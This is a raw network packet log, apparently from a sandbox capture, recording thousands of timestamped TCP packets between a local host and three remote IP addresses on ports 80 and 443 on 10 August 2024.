Aug 10, 2024 16:12:24.033194065 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.033199072 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.033312082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033323050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033333063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033343077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033370018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033380985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033391953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033402920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033404112 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.033404112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033404112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033415079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033421993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033452034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033463955 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033473015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033488989 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033488989 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033488989 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033489943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033509016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033519983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033529043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033529997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033529997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033541918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033554077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033591032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033591032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033591032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033591032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.033947945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033957958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033968925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033979893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.033992052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034009933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034020901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034024000 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034024000 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034032106 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034039974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034043074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034053087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034064054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034075022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034085035 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034095049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034106016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034116030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034116030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034116030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034116030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034137011 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034174919 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034311056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034322023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034331083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034343958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034385920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034385920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034385920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034465075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034473896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034491062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034519911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034531116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034548044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034559011 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034559965 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034569979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034581900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034591913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034603119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034615040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034625053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034635067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034636021 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034636021 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034637928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034646988 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034656048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034670115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034681082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034691095 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034701109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034704924 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.034713030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.034717083 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.034771919 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034771919 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034771919 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.034771919 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034771919 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.034785986 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.034801960 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.034959078 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.034981966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.035058975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.035087109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.035098076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.035160065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.035160065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.037465096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.037650108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.037658930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.037703037 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.037766933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.037786961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.037836075 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.038078070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.038105011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.038113117 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.038127899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.038249969 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.038249969 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.039530993 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.039546013 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.039627075 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.039633036 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.039932966 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.039948940 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.040009022 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.040009022 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.040014982 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.040072918 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.041140079 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.041152000 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.041286945 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.041292906 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.041335106 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.041910887 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.041924000 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.041976929 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.041981936 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.042026997 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.042377949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042474031 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042484045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042494059 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042504072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042519093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042529106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042546034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042644978 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042654991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042665005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042674065 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042680025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042690039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042695999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042702913 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042710066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042718887 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042726040 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042742014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042747021 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042756081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042767048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042773008 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042782068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042792082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042798996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042808056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042820930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042825937 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042834997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042843103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042850971 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042864084 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042869091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.042880058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.042905092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043051004 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043060064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043068886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043078899 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043087006 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043109894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043133020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043142080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043150902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043160915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043173075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043181896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043195009 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043220997 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043335915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043345928 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043354988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043365955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043373108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043382883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043389082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043397903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043411016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043416023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043425083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043433905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043442011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043453932 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043458939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043478966 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043497086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043546915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043555975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043565989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.043582916 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.043610096 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044022083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044118881 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044128895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044142962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044159889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044187069 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044203043 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044214010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044224024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044259071 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044281960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044291973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044301987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044312954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044325113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044331074 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044339895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044348955 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044356108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044370890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044390917 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044464111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044473886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044493914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044507980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044596910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044608116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044616938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044627905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044635057 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044644117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044655085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044661045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044670105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044677019 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044684887 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044696093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044703007 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044712067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044723034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044728041 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044744015 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044764996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044786930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044796944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044872046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044883013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044893026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044900894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044910908 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044924974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044929028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044940948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044945002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044954062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044960022 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044971943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.044976950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.044985056 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045006037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045020103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045030117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045048952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045053959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045207977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045218945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045243025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045249939 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045258045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045269012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045279026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045286894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045295954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045306921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045312881 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045321941 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045329094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045339108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045347929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045356035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045363903 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045371056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045381069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045388937 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045397997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045416117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045439959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045604944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045614958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045623064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045633078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.045644045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.045672894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.062170029 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.062201977 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.062381983 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.062381983 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.062448978 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.062931061 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.084759951 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.084778070 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.084855080 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.084860086 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.085139990 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.088080883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.088098049 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.088120937 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.088136911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.088146925 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.088170052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.088201046 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.088202953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.088217020 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.088219881 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.088233948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.088243008 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.088265896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.088274002 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.088280916 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.088304043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.088304043 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.088370085 CEST	49739	80	192.168.2.4	147.45.44.104
